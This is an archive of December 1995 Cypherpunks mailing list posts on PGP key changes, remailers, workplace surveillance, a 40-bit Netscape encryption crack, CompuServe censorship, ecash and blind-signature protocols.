revoke my old userID, so I have to revoke the whole key to get people to stop using it. Below is my revocation certificate, which I created shortly after I generated my new key in 1994. Please discontinue the use of my old key and my old email address. Note that this revocation does not imply that my old key has been compromised. -Philip Zimmermann prz at acm.org Here's my old public key with the revocation certificate... - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAipt8iwAAAEEALGKgLblEQCfcZEiQ+jBFnw5g0B+o16GMPssYBKI7bWgjGbB DqnkQoMGagNJpcG5tX2bKpJdegi01Sp22QOMpZbdrv/KXRWHp/JjrNLAZHp9B+nl osbRrPLhGZZA/OgyU6D2GsGnMDcTacPD43wo1g+RUpDv+UjMr+J13g7/Z/cLAAUR iQCVAgUgLIUrAOJ13g7/Z/cLAQHThQP+NtEJ2yPCXPA+Em45HDWQLwb3X0AM61K0 Mt0Woq54eaC1U5A03oVqV5wEPM6mfrhH18FB6NwO5eROKOdXY1xz7nCggJ9eYfoX ZH6wfXCqGFSB4oLJU97nFHrqvh69IYSrrlKM/dJ29F5CKVxJApstpnRmfHddrZLP yfR2y6dxGeW0LFBoaWxpcCBSLiBaaW1tZXJtYW5uIDxwcnpAc2FnZS5jZ2QudWNh ci5lZHU+ =9UCt - -----END PGP PUBLIC KEY BLOCK----- Here's my new public key, generated in May 1994... - -----BEGIN PGP PUBLIC KEY BLOCK----- mQCNAiv8ZoAAAAEEAKc4d45hN5qFM79nWGLkrGWputWmtdxJk0BZEbi0kNRbJBC2 p10ASImd//cCDwLR2alBUSt8O2WGik9PBZgthjMOenoDmzKiG8BkE9AFKonyxvD2 lDnqbydXi+YQmOTsWSw4jTTSb3cflhVkf8hVUVpMFQThafV0CmV5hLjHqWbdAAUR tCJQaGlsaXAgUi4gWmltbWVybWFubiA8cHJ6QGFjbS5vcmc+iQCVAgUQLB48XPTK AIGN5yLZAQHWtwP/RBiLPN4dnt8sm9qZtK0HPYV0hfdZ4IiSfR0V52uKKMQsIrBJ x2c5Z2vurBLeKkh8Oecf/X+Zh2mEenrymR/urBCf8xGQnyTPew4t/3IQ5KXsqi2b uOTysk9Pkk+cqxZTEXJQWixB3fVKrCkR02xbWcRXQ/pPs0ObOE4VLtQT1G2JAGAC BRAsHUvayj2h/YZap/MBAcRRAliFU3EgFQdOGkC2nCupBAitm/R6CkKtayTZHQrd e5I/pCY0bGUc6alEnSuqZUyA9HC1fMg0iqsqM4vrQ6PZr2qV0IXDY4miyYNRJyKJ AJUCBRAr/GdG4nXeDv9n9wsBAYr/BACh4r3DZsq9IOy2mcd+0D0qKV0Ymb887Lw0 KjIBKLmUIqXUw2Rbn8bAnr+GF0qGE61oAHdSSN7pLROmfjl7nMVaODXHOxYuLHAn HZ0Z/AQsLc5U055Pm6rQ5lKrSaL4z9mEKJTWM9hQDYMZpH4oAC8hIz+apYH+/hBj ZR9w7AKluw== =1jM9 - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOOo+WV5hLjHqWbdAQHhaQP/SW02cLbkAtHq6cdNHtcJ4YqSlKqxumyR BYpjKrNatLiVAFQP8njiLRFqPi8rgf6809nnQETIVcyt3BzURakyJLd4UuL3vvqD lluyGdj9MoaQiQkWIbBMADFdNGFDvRCQkcxhS78hHwXSY7viCSWNnfCdJcpaFNCk QPfqPsMErMo= =uH7K -----END PGP SIGNATURE----- From gbroiles at darkwing.uoregon.edu Fri Dec 29 03:10:40 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Fri, 29 Dec 1995 19:10:40 +0800 Subject: Employer Probing Precedents? Message-ID: <199512290937.BAA21468@darkwing.uoregon.edu> At 10:12 PM 12/28/95 -0800, Tim May wrote: >However, corporations aren't given the luxury of disassociating themselves >from the actions of their employees. (Contract workers are a further issue, >and the issue of whether they supply their own tools/computers, workspace, >etc., enters in.) I think this point about "contract workers" is going to become a lot more interesting as people move away from the traditional "employee for life" model and towards working at home/telecommunity, or working as subcontractors/consultants, etc. Further, it's becoming more common for employees to own their own communcations tools, and bring them to work. Arguments about a right to eavesdrop as being derived from workplace property ownership don't seem to work where an employee is talking on their personal cell phone, getting/sending messages on the SkyTel two-way pager that they pay for, using their laptop/Newton/PDA to get/send E-mail (using their private ISP/POPmail provider mailbox), and so forth. The concerns (about disclosure of secrets or wasting of time) raised to justify the invasions of employee privacy are still present, of course, but not the convenient "it's not your phone so you have no privacy" excuse. Employee/contractor ownership of work tools (or non-work related communication tools in the workplace) is probably going to get even more interesting; recent Ninth Circuit decisions re copyright law and licensing agreements have been sharply restricting the right of software licensees to allow third parties to use the licensed software. (e.g., _MAI v. Peak_ and _Triad Systems_, see http://darkwing.uoregon.edu/~gbroiles/triad for more on this and pointers to other analysis and the opinions themselves) I think this may lead to software licenses (or hardware ownership) which follows employees from home to work, and from job to job. Employees may get a credential from Microsoft, or Borland, or Mathematica or Word Perfect saying that they're allowed to be using a set of software tools; professionals will probably pay for those credentials themselves, or have them paid for as a fringe benefit of employment. An easy connection is to training related to the "software-right" - the licensor would also certify that the employee has been subjected to X hours of training and knows at least Y buzzwords and Z fancy tricks relating to the software. Retired or unemployed workers may work in a "black market", using software they're trained on but not licensed/certified for, logging on with the credentials of licensed users who have died recently or are sleeping. (Similar to the network of unlicensed uninsured under-the-table contractors, framers, electricians, drywall installers, etc., who exist at the fringes of construction activity.) And so on. >I maintain that my employees are beholden to me as to what they run on >their computers. They can always choose not to work for me. (And the same >applies to hotels, actually. Were a hotel to have stringent rules on >in-room behavior, such as the YMCAs and religious retreat hotels have, then >customers have little right to complain about bed checks, mixed sex bans, >etc. That most hotels have no such rules says more about where the >Schelling points are than it does about the efficacy of rules and laws. Subscribers to the Coase theorem would suggest that (modulo transaction costs) it doesn't matter who is initially assigned the right to determine whether or not surveillance will occur - the party who most values that right will bargain for it in the end. Then again, that party may lose something in exchange - and that's what makes this interesting. (And, I think, much too complex to simply be dismissed as a matter of "property rights". Then again, property looks to me like something that law creates, not something which exists pre-law which law is created to protect. YMMV.) I'd rather see the right to control surveillance assigned to employees, and let employers pay extra for it if they think it's necessary to their business situation. (Some might argue that this is the current situation, or at least that surveillance is something that market participants bargain over. My impression is that the current situation is legally murky absent a clear statement re "we're going to monitor you on the phone and search your briefcase when you enter and leave" and that a clear resolution re the legal baseline of surveillance would be useful to bargainers. And if we were to set a baseline for further bargaining, I'd rather see it set to favor employees.) -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- Antonin Artaud | From wb8foz at nrk.com Fri Dec 29 03:17:14 1995 From: wb8foz at nrk.com (David Lesher) Date: Fri, 29 Dec 1995 19:17:14 +0800 Subject: FH radios In-Reply-To: <199512262025.OAA09759@cdale1.midwest.net> Message-ID: <199512270252.VAA00427@nrk.com> > I agree; but, if the information you are passing is truly that important > just use a landline phone. Eliminate the possable "leak". > I'm not claiming that a landline phone is secure, but your cordless is > connected to it, so no matter how good your security is on the phone its no > longer secure once it leaves the base station and enters the landline. Argh.... Phones are ANYTHING but secure. Hence the STUIII & PGPphone. An encrypted rf link is far better than any POTS.... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From gbroiles at netbox.com Fri Dec 29 04:35:21 1995 From: gbroiles at netbox.com (Greg Broiles) Date: Fri, 29 Dec 1995 20:35:21 +0800 Subject: ideath remailer permanently down / PGP key changes for Greg Broiles Message-ID: <199512291202.EAA02102@darkwing.uoregon.edu> -----BEGIN PGP SIGNED MESSAGE----- I don't think that the local freenet folks are ever going to get my domain name again, so I'm officially announcing the closing of the remailer formerly located "remailer at ideath.goldenbear.com". Mail to the goldenbear.com domain has been bou for almost three weeks now, and I expect that to continue. Sorry for any inconve I predict about a year of erratic net access and moving around while I finish la school, take the bar exam(s), and find a job or get a business started. When eve settles down I plan to find a reliable net connection and run a remailer again. Due to the loss of my domain name and UUCP connectivity, other changes are happe I'm now using a Windows box, not a Unix box, for my net access; have switched to for DOS and Private Idaho (nice job, Joel!). Am also using a new PGP key, since my old one (0x58ddf30d) was almost 3 years ol updated the MIT PGP keyserver with an "obsolete" marker for the old key, as well new key (signed by my old key). The new key is appended to this message. Am using a new long-term E-mail address, "gbroiles at netbox.com". Re my discussion weeks ago of alternatives for mail storage/forwarding, I have settled on netbox. can receive mail as "gbroiles at darkwing.uoregon.edu" but I expect that address to working sometime this coming May. The netbox.com address will ideally keep worki years to come. - -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- Antonin Artaud | -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMOPafv37pMWUJFlhAQGnhAf/XrHe38eww+sMf0/mmqKFzT9xX9USCCBO 5yMteRAmAsEiiTo8TPcRPlB6eKqCrCiJJqDMfxm3UaWhhqBilRhQoB8BqdCvjTLY 87/HsHKV3Iv4IPvud+ojk9GEXwUf204U9m/CgVF17HKO+XTCK5GVN7gmsqWWxsLr a5gNccpentcFiy0KJVUWfLguOXA20I+nGnkZjMBK/RAPotBg4gezE2jqjbYyQ1rC y0SLX843ufEfRaePC1X8IyWH32gqiyrW5rZuTo8B2usbR96Y2VXXX6Oprrd5CD38 AuUhjkOXVEsCFVP5bt6uQbM81Uhvxc1mFYHYKKJyuWPWo5E6tBwXZA== =Heo3 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAy8+sdEAAAEH/2YvMvdRxoxAIpNp1W88EGq4EMOVhpucjGjZByoJATpDoU+x sqZl6lwzWh7yhHbLfuUZhWZVhLlLGxOAcHkZ3o6Tao+T/qCLKUnyFtw3Q/Wpzfiw YIGbXkbKvSaI7U3PTMHraimiZNAW/QAhIuLanVEkl/rko/aIdvyIfOJSFHW9Bjml ArZmyrsT8PiA+Eiqa+JyRv/JnWiJJ00FYHhG1GkcAvBovQJxxLzqq9PcB8nVlVfS t4aV2z1OfmjXHq4pgUye6CwdjzXnMz3e70FT1erkoP+/iC56iSkb/4J67y8NnKgq RNQ8lt+X2+vnq3Fa8r8EhhqZFZcV/fukxZQkWWEABRG0IkdyZWcgQnJvaWxlcyA8 Z2Jyb2lsZXNAbmV0Ym94LmNvbT60KUdyZWcgQnJvaWxlcyA8Z3JlZ0BpZGVhdGgu Z29sZGVuYmVhci5jb20+iQCVAwUQLz8tYn3YhjZY3fMNAQGOkwP/cYeYdbTj9H0C BVI9nw70avUIGYUWT1HdQaK6YqdOvV4Eg56rpKdFEFlwUdOBg8MbuFaLMbbAnKxH EvGsQBtu0N1kyIebMAuEniT/22yVlVGHHS+uGxyBKq1i7Nv5uRXl2WSdQDUCHN0W 9YAzReRI1F6ExnVXJHuHo4EY7lQ3P94= =yJO8 -----END PGP PUBLIC KEY BLOCK----- From ses at tipper.oit.unc.edu Fri Dec 29 06:07:49 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 29 Dec 1995 22:07:49 +0800 Subject: practical annoyances from multi-level security? Message-ID: Does anybody have any pet peeves and gripes about using systems with a compartmentalised security model- things that took ages to do even though they didn't really impact security, features that just got in the way or were too complicated to really use, etc? I'm currently working on a problem that seems to have some analogies to the compartmentalised problem, running code with various levels of trust were deliberate read-up and accidental write-down could be a breach. I've personally never used a system of this sort, but I've heard from friends in the RAF doing COM/SEC (more COM than SEC) that MLS can be a real pain at times. [for the truly paranoid, the RAF operates a network of communication satellites called Skynet :-)] Simon p.s. still no luck on the Hackers soundtrack - I did recognise a few prodigy tracks though (defun modexpt (x y n) "computes (x^y) mod n" (cond ((= y 0) 1) ((= y 1) (mod x n)) ((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n)) (t (mod (* x (modexpt x (1- y) n)) n)))) From jya at pipeline.com Fri Dec 29 07:06:37 1995 From: jya at pipeline.com (John Young) Date: Fri, 29 Dec 1995 23:06:37 +0800 Subject: CAV_ein Message-ID: <199512291234.HAA01062@pipe4.nyc.pipeline.com> 12-29-95. NYPaper: John Markoff page-ones Compuserve's cave-in to Reich sex law and the alt free-screeching for sex home censorship cave-in to rutting parents ashamed. CAV_ein From gbroiles at darkwing.uoregon.edu Fri Dec 29 07:08:37 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Fri, 29 Dec 1995 23:08:37 +0800 Subject: ideath remailer permanently down / PGP key changes for Greg Broiles Message-ID: <199512291247.EAA05290@darkwing.uoregon.edu> Doh, the wordwrap on that message was ugly. Sorry. Gotta spend some more time making friends with Private Idaho. Short version: remailer at ideath.goldenbear.com is gone forever, sorry. All mail to anything @goldenbear.com is bouncing. Mail for me should be sent to "gbroiles at netbox.com", effective immediately. I have distributed a new PGP key to the keyservers and marked my old key obsolete. I will be signing list messages again once I get that wordwrap thing fixed. -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- Antonin Artaud | From nobody at REPLAY.COM Fri Dec 29 07:14:16 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 29 Dec 1995 23:14:16 +0800 Subject: Chinese Cypherpunk quote [NOISE] Message-ID: <199512291320.OAA23382@utopia.hacktic.nl> I see that some rants here are rubbing off on the folks who write chinese fortune cookies, In tonites dinner, The cookie said: The will of the people is the best law. I wonder if we can get a couple thousand cookies sent to Congress with that message? A.E.N. or to T.C.M..... Xmas_Troll From weld at l0pht.com Fri Dec 29 07:46:58 1995 From: weld at l0pht.com (Weld Pond) Date: Fri, 29 Dec 1995 23:46:58 +0800 Subject: Netscape 40-bit cracking. The new computing benchmark? Message-ID: >From Infoworld Dec 25, 1995 page 3. Netscape Commerce Server Security Broken Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape Commerce Server. Unlike a similar security break-in [talk about bad terminology] by a French university student last August, which required eight days, 120 workstations, and two supercomputers, ICE said it used a computer that cost $83,000 and compromised the Wold Wide Web server's security in 7.7 days. [Hey, what about the Cypherpunks crack that only took 31.8 hours?] Netscape Communications Corp. officials were not surprised by the security crack. "We've known that 40-bit encryption is breakable since we shipped the server. That's the reason it's allowed to be exported," said company spokeswoman Rosanne Siino. "We need to keep lobbying to get rid of the U.S. governments 40-bit restriction on what can be exported." Within the United States, Netscape sells products with 128-bit encryption. Weld Pond - weld at l0pht.com - http://www.l0pht.com/ L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From tallpaul at pipeline.com Fri Dec 29 13:30:43 1995 From: tallpaul at pipeline.com (tallpaul) Date: Sat, 30 Dec 1995 05:30:43 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause Message-ID: <199512291548.KAA19627@pipe6.nyc.pipeline.com> On Dec 28, 1995 23:30:19, 'tcmay at got.net (Timothy C. May)' wrote: > >I see a positive longterm trend toward people connecting through smaller, >more local services. > Quite correct. Not only does the internet radically change (at least perceptions) of space and time, it also is producing serious disequilibriums of scale in economics. Economy of scale states that until a farily high limit is reached, bigger enterprises tend to produce goods that are less expensive than those produced by smaller enterprises. Specialized handicraft production aside, the goods produced in larger enterprises also tend to be of higher quality. The disequilibrium here began with the development of the microprocessor as we see from the shift to the old centralized IBM iron to the microcomputers we're using today. Ditto certain aspects of network switching. Ditto DES moved from centralized hardware to decentralized software. We're seeing a growing dystopian world where national entities and non-governmental organizations all seek to enforce their particular cultural/political/economic/etc. biases on the global internet. I believe this process will continue for some period of time. At the same time we may (and I think likely will) see aspects of the net broken down into widely geographically separated locations that simultaneously have no more effect on end users than the floor at the central library on which the book we want resides. E.G. we'll use Denmark to get "alt.sex.granny.gum-jobs," ftp to Singapore for "/warez/microsoft/win99/hack/" and to the Turcos Islands for "data.finance.internal.morgan." We'll have all three open and on our monitor at the same time, passed through an second-level ISP in some small country that decides there's money in switching and will no more regulate data throughput than they would try to hold hotel keepers responsible for the content of the phone calls made by their tenants. --tallpaul From Bill.Humphries at msn.fullfeed.com Fri Dec 29 14:17:54 1995 From: Bill.Humphries at msn.fullfeed.com (Bill Humphries) Date: Sat, 30 Dec 1995 06:17:54 +0800 Subject: Compuserve is Not "Censoring" Message-ID: This is a resend of a reply to Tim May's message on the CI$/Bundsweiser Republic/alt.nekkid.hitler.youth controversy. The Cypherpunks mailer didn't enjoy my attempts at humor in the headers... ------------ Tim May wrote: >At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent >dropping of many newsgroups in response to demands by German prosecutors: > >>I won't start to comment on the style of this message. The term "Suitspeak" >>comes to mind. > >Perhaps it is "Suitspeak," but it is not "censorship." > >Or, more precisely, it is fear that government laws will be used to >sanction the service. Thus, it is the government of Germany in this case >which is "censoring." ("Censor" and "censorship" are notoriously overloaded >terms, of course.) It's a political problem. This demonstates the basic problem with tollerating monopolies in this industry. When governments interfere, everyone subscribing loses, which means most of the people in the audience for the service loses. Unfortunately, there are no technological fixes (in the short term) for monopolies. The shumpeterian cycle is too long for the time horizons engendered by the German government's actions or the Exon/Gorton/Hyde language. You have to fight monopolies on the political arena as well as the technical (remember how the WWW was going to liberate all of us on it's own? Until the elites recognized people wouldn't be watching Microsoft ads *conspiratorial wink*.) If I were a compuserve user, complain to your nearest German consulate and call your congresscritter. Those GOP types will have a field day condeming "euro-data-imperialism" during special order speeches on C-SPAN. Support your local ISP. Bill Humphries PS: If only the Germans worried about Nazis during the Nurmemberg trials the way they worry now, maybe they wouldn't be facing their current plauge of nativist/skinhead problems. From rah at shipwright.com Fri Dec 29 14:17:55 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 30 Dec 1995 06:17:55 +0800 Subject: (fwd) DigiCash licencing? Message-ID: --- begin forwarded text Organization: Digiturg Date: Fri, 29 Dec 1995 17:32:10 +0200 (EET) From: Jyri Kaljundi To: ecash at digicash.com Subject: DigiCash licencing Mime-Version: 1.0 Sender: owner-ecash at digicash.com Precedence: bulk Reply-To: ecash at digicash.com Does anyone know about the terms and costs of licencing ecash software? I have tried contacting DigiCash directly with these questions, but have got no answers :( And who and where are already implemeting ecash? Mark Twain Bank and Swedish post are two I know of, what about the others? Our company is very interested in using ecash here in Estonia, but somehow DigiCash does not seem to allow that. With all the best, Juri Kaljundi, managing director, DigiMarket jk at digit.ee --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From sjb at universe.digex.net Fri Dec 29 14:51:13 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 30 Dec 1995 06:51:13 +0800 Subject: Proxy/Representation? In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net> Message-ID: <199512291752.MAA11504@universe.digex.net> "David E. Smith" writes: >That's more of what I was looking for. I suppose that (I'm still using >PGP as my example) there could be a shared PGP key, signed by Helen and >myself, where only the two of us know the passphrase, with a keyid of >"David Smith on behalf of Helen Jones " >or something similar. The obvious problem is that in sharing the pass >phrase the security is weakened. (Paranoid threat model: at some point >we have to decide on the pass phrase, and we are videotaped/bugged/spied >upon while this takes place.) Why bother with the shared key? You need a message from Helen describing the powers with which you are invested, signed by her key. The wonderful thing about data is that copying it is virtually free. When you issue an order on her behalf, include a copy of the signed PoA, and sign the whole thing with your key. From shamrock at netcom.com Fri Dec 29 15:02:46 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 30 Dec 1995 07:02:46 +0800 Subject: Ecash graphic images? Message-ID: At 20:58 12/28/95, anonymous-remailer at shell.portal.com wrote: >Could anyone provide some pointers to a gif or jpeg file containing >good-looking ecash coins? I would like something larger and more >detailed than the "we accept ecash" you see everywhere. Thanks very >much. Try http://www.delorie.com/gif/signs/ -- Lucky Green PGP encrypted mail preferred. From cp at proust.suba.com Fri Dec 29 15:12:24 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sat, 30 Dec 1995 07:12:24 +0800 Subject: blind validation In-Reply-To: <199512290144.RAA28654@jobe.shell.portal.com> Message-ID: <199512291816.MAA09405@proust.suba.com> > Chaum's way around it was basically to have some mechanism to give > each person a unique number of some special form. There doesn't have > to be any agency who knows what number each person has (in fact, there > isn't, in his scheme), but there is a mechanism to assure that one > person does not get two numbers. This is sometimes loosely referred to > as an "is-a-person" credential (although in this specific context it is > not actually a credential, just an identifier). If I understand you correctly, this protcol allows Alice to create one and only one nym that can't be connected to her real identity. All of Alice's transactions can be linked together and to that nym, but there's no way to tag Alice with them. The main difficulty I see with this protocol is that if things go wrong, they go very wrong. If Alice slips up once, or if she's compelled to give herself up, then she loses everything and gets tagged with all of her transactions. Does anyone have a pointer to Chaum's paper? [...] > So the result in effect is to make it difficult to give away just a > validation, without also giving away the ability to act as you. Here > is an idea about another way to achieve the same thing, closer to > Alex's example: Alice gets a blind validation as Alex describes based > on a simple blind signature. (Alice hands a blinded number to Bob, he > signs it, Alice unblinds it, and uses the resulting signed number as > the validation to, say, access Bob's files.) We add that Alice puts, > say, $100 into "escrow", encrypting it with the secret number and > putting it on some public server. She proves to Bob that she has done > this using cut and choose. > > Now if Alice gives away her secret number, anyone using it will be able > to access Bob's files, but they can also get the $100. So now it costs > something for Alice to give away her secret. > > (There are some major problems with this idea, the worst being that Alice > can extract and spend the $100 right after proving to Bob that she is > doing what she said, and before publishing her number. Maybe someone > could think of some fixes.) This is a good idea because it addresses one of the big problems with my protocol, the impossibility of introducing latency. But apart from the problem you mentioned above, isn't there a problem with setting the escrow amount? Ordinarily, we'd want to set the amount just high enough so that Alice doesn't have any interest in cheating. Whatever benefit Alice gains will be offset by the penalty. How do we put a numeric value on the benefits Alice gets from cheating? Don't we create a situation in which a rich guy might be perfectly comfortable with the risk of losing the money, while someone else might not? From attila at primenet.com Fri Dec 29 15:23:03 1995 From: attila at primenet.com (attila) Date: Sat, 30 Dec 1995 07:23:03 +0800 Subject: easy avoidance of PGP signature forgeries and reuse In-Reply-To: Message-ID: START I never paid much attention to the problem other than to avoid it by forcing it --i.e. list the destination and the send inside the signature block, thus: ----------------- BEGIN PGP SIGNED TEXT To: john doe Newsgroups: sci.crypt From: jane roe Subject: that's all folks! John, don't darken my door during the Christmas holidays. Nevermore. jane ---------------- BEGIN PGP SIGNATURE ERTYUIKJBNM,./34567JM,./ ---------------- END PGP SIGNATURE with e-mail, e-letters, direct faxes, etc. it is to easy to ignore the courtesy header. From a standpoint of security, you have blown away each of the attacks outline in your article in so much as the signature will not compute if the courtesy block is omitted. personally, I do not think PGP 3 should attempt to solve the problem. Most of the headers involved are applied _after_ the message leaves the mail program; and, PGP interfaces are virtually the same as invoking an alternate editor, which gets you nothing. END -- -------------------------------------------------------------------- #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 James A. Donald wrote: > At 09:45 AM 12/26/95 +0100, Anonymous wrote: > >Check out http://www.hrb.com/encryption/ssp.html, your > >exclusive source of the Ultron Crypto-Engine (tm) > > The web page proudly announces: > "is the only NSA-approved Type I data encryptor available today." > > There are probably some people ignorant enough to regard that as > a recommendation. >James A. Donald What's the problem? If you're a contractor or agency looking to store classified data, the NSA approval is essential. There's no pretence in the ad that the NSA can't read it. It says: "NSA provides necessary keying material for SSP3110 operation." and "It is available to U.S. Government agencies, military organizations, and defense contractors." This is not a snake oil product ala "Power One Time Pad" (sic). It's a real system, approved for use with classified data. I strongly doubt that there are any known holes (with the NSA supplying the key material, why should there be?) Speaking for myself, Peter Trei trei at process.com From EALLENSMITH at ocelot.Rutgers.EDU Fri Dec 29 15:36:16 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sat, 30 Dec 1995 07:36:16 +0800 Subject: another anonymous poster helping to destroy our rights Message-ID: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu> From: IN%"vznuri at netcom.com" "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58 >= the list charter can ask for people to submit to various practices on the honor system, such as not using pseudonyms. cryptoanarchists who hate the idea of trust are of course going to object to the honor system, because "that which cannot be enforced should not be prohibited". ---------------- Does this last idea leave much doubt in anyone's mind that "Vladimir Z. Nuri" is a Detweiler tentacle? -Allen From EALLENSMITH at ocelot.Rutgers.EDU Fri Dec 29 15:47:23 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sat, 30 Dec 1995 07:47:23 +0800 Subject: "Cybercrime" Article from Reuters Message-ID: <01HZDS4NA1PC8Y55Y6@mbcl.rutgers.edu> Most of what they claim to be looking for is stuff that most people won't object to their countering. Still, if anyone spots a government agency offering an "informant" email address, posting it so that we can send them lots of stuff (i.e., all the "Make Money Fast" pyramid schemes) would seem to be a good thing to do... it should occupy them so that they're doing things that are useful. Cypherpunks relevance? Well, there is the mention of anonymnity. -Allen Reuters New Media _ Thursday December 28 6:31 AM EST _ Authorities Patrolling Cyberspace for Crime WASHINGTON (Reuter) - Crime on the Internet is now more than just dirty pictures. With millions of people and a fast-growing commercial presence in cyberspace, federal law enforcement authorities are struggling to crack down on wrongdoing in the new territory. They are hunting for bogus get-rich-quick schemes, weight-loss miracles, AIDS cures, credit-repair programs, investment scams and gambling. That's in addition to crimes such as trafficking in child pornography. ``The scams are the same. The way you investigate them is different,'' said Lucy Morris, assistant director for credit practices at the Federal Trade Commission, which has staff attorneys monitoring the Internet. Just as they would on the street, these ``cybercops'' act on tips or they just patrol. The potential crime scenes are the Internet worldwide computer network, computer online services such as America Online and smaller computer bulletin boards. Cruising cyberspace as part of their work are employees with the FTC, the Securities and Exchange Commission, the Department of Transportation, the Secret Service, state attorneys general and state securities regulators. They can work at the office or from home. ``In some respects it's easier to find the violations because you don't have to leave the office,'' said Minnesota Deputy Attorney General Tom Pursell. But there are obstacles. Cyberspace offers criminals wonderful anonymity and law officers face ambiguous jurisdiction issues due to the global nature of the Internet, raising questions about whether new laws are needed to cope with the new medium. ``Now all you need is a computer, a telephone, a little bit of software, and you're in business,'' said Hubert Humphrey III, the attorney general of Minnesota who himself prowls cyberspace in search of wrongdoing. Authorities agree they have their work cut out. ``It's going to be very difficult,'' predicted Humphrey, whose state has been out front in tracking down wrongdoing. From EALLENSMITH at ocelot.Rutgers.EDU Fri Dec 29 15:51:53 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sat, 30 Dec 1995 07:51:53 +0800 Subject: Telecom Bill Rewrite Message-ID: <01HZDSQB7MJ48Y55Y6@mbcl.rutgers.edu> It looks like some political pressure will still be possible. Definitely good news, especially since most of the methods for receiving "banned groups" listed in the FAQ are through US sites. -Allen Reuters New Media _ Friday December 29 5:51 AM EST _ Dole, Gingrich Unhappy with Telecom Bill WASHINGTON (Reuter) - Top House and Senate Republican leaders expressed unhappiness Thursday with a proposed rewrite of the nation's communications laws amid signs the Republicans may seek changes in legislation circulating on Capitol Hill. ``There are a number of problems in the bill that could have been resolved in a different way,'' Senate Majority Leader Robert Dole told a news conference. The Kansas Republican, appearing with House Speaker Newt Gingrich, said there are ``three, or four, or five provisions'' GOP leaders ought to focus on, including what he described as a ``giveway'' of a key part of the airwaves to broadcasters. The plan worked out by congressional negotiators proposes that in the future, when the government doles out licenses for high-definition digital TV, the Federal Communications Commission ``should'' limit eligibility to existing broadcasters. Critics have charged this would amount to a multibillion dollar giveaway of the airwaves to the broadcast industry and that the government could instead raise as much as $70 billion through a competitive auction of the digital spectrum. Last week it appeared the White House and congressional leaders had reached agreement on legislation to overhaul the 61-year-old communications laws, following weeks of work by House and Senate negotiators. The plan would tear down decades-old laws and permit telephone, cable and broadcast companies to invade each other's turf. But after Vice President Al Gore and some congressional leaders said they had achieved an accord, other Republicans began to balk at the proposal, saying no deal had been struck. The protests scuttled any chance the telecommunications bill would be completed this year. Among other things, Republicans expressed dissatisfaction with provisions to ease restrictions on the number of TV stations broadcasters could own, saying the plan did not go far enough. They also cited issues such as regulation of the Internet and a decision to drop language permitting greater foreign investment in telecommunications. From roy at sendai.cybrspc.mn.org Fri Dec 29 16:21:40 1995 From: roy at sendai.cybrspc.mn.org (Roy M. Silvernail) Date: Sat, 30 Dec 1995 08:21:40 +0800 Subject: CAV_ein In-Reply-To: <199512291605.LAA15428@pipe4.nyc.pipeline.com> Message-ID: <0T6DkDvcwapi@sendai.cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- [ kudos once again to John Young for making the NYT material available] > The New York Times, December 29, 1995, pp. A1, D4. > > On-Line Service Blocks Access To Topics Called Pornographic > > Complaint by Germany Has Worldwide Impact > > By John Markoff [big snip] > "In the future, every Internet operator will be subject to > local laws," said Eric Schmidt, chief technology officer > for Sun Microsystems Inc., a Mountain View, Calif., > computer maker. "And software will be developed to provide > the appropriate local censorship." Ick. There's some truth in the first quoted sentence, but I fail to see any censorship as "appropriate". Does Mr. Schmidt swing much weight in Sun's policy department? - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMORMg2Cl9Uka85MxAQErqgf/Wx/Ai7EUSv1QpipAAtsEDLbos/aH+INT mA8+hF6PIyONHjwxsz24L5+c7ZcmiwshmH4pJpI/l1b9H9Wz/O/aKG+QqOr7hTtY 